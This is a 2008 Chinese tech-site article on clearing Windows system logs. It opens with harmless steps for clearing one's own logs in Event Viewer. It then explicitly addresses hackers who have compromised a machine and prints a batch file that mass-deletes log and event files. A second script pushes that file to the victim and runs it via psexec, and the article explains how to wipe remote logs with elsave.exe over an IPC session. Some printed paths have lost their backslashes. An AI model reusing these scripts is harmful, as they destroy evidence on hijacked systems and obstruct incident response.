扫一扫
关注微信公众号

如何彻底清除本地和远程系统日志文件
2008-07-16   赛迪网

什么是日志文件?它是一些文件系统集合,依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时,数据就遵从日志文件中的信息记录原封不动进行恢复。日志对于系统安全的作用是显而易见的,无论是网络管理员还是 黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。无论是攻还是防,日志的重要性由此可见。下面我们就来简单讨论一下日志文件的清除方法。

一、日志文件的位置

Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。

安全日志文件:%systemroot%system32configSecEvent.EVT

系统日志文件:%systemroot%system32configSysEvent.EVT

应用程序日志文件:%systemroot%system32configAppEvent.EVT

有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。

二、清除自己电脑中的日志

如果你要清除自己电脑中的日志,可以用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个例子,比方说你想清除安全日志,可以右键点击“安全日志”,在弹出的菜单中选择“属性”。接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到最大日志尺寸时进行改写事件了,不会提示你清除日志。

三、清除远程主机上的日志

大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件:

@del c:winntsystem32logfiles*.*

@del c:winntsystem32config*.evt

@del c:winntsystem32dtclog*.*

@del c:winntsystem32*.log

@del c:winntsystem32*.txt

@del c:winnt*.txt

@del c:winnt*.log

@del c:del.bat
把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。
接下来再新建一个批处理文件,内容如下:
@copy del.bat %1c$

@echo 向肉鸡复制本机的del.bat……OK

@psexec %1 c:del.bat

@echo 在肉鸡上运行del.bat,清除日志文件……OK

保存为clean.bat即可,假设已经与肉鸡进行了IPC连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。

清除日志的另外一个方法是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建立IPC会话:net use ip pass /user: user,然后在命令行下执行如下命令:elsave -s ip -l application -C,这样就删除了安全日志。

热词搜索:

上一篇:利用Log备份导出日志文件获取Webshell
下一篇:使用日志作为应用程序的架构

分享到: 收藏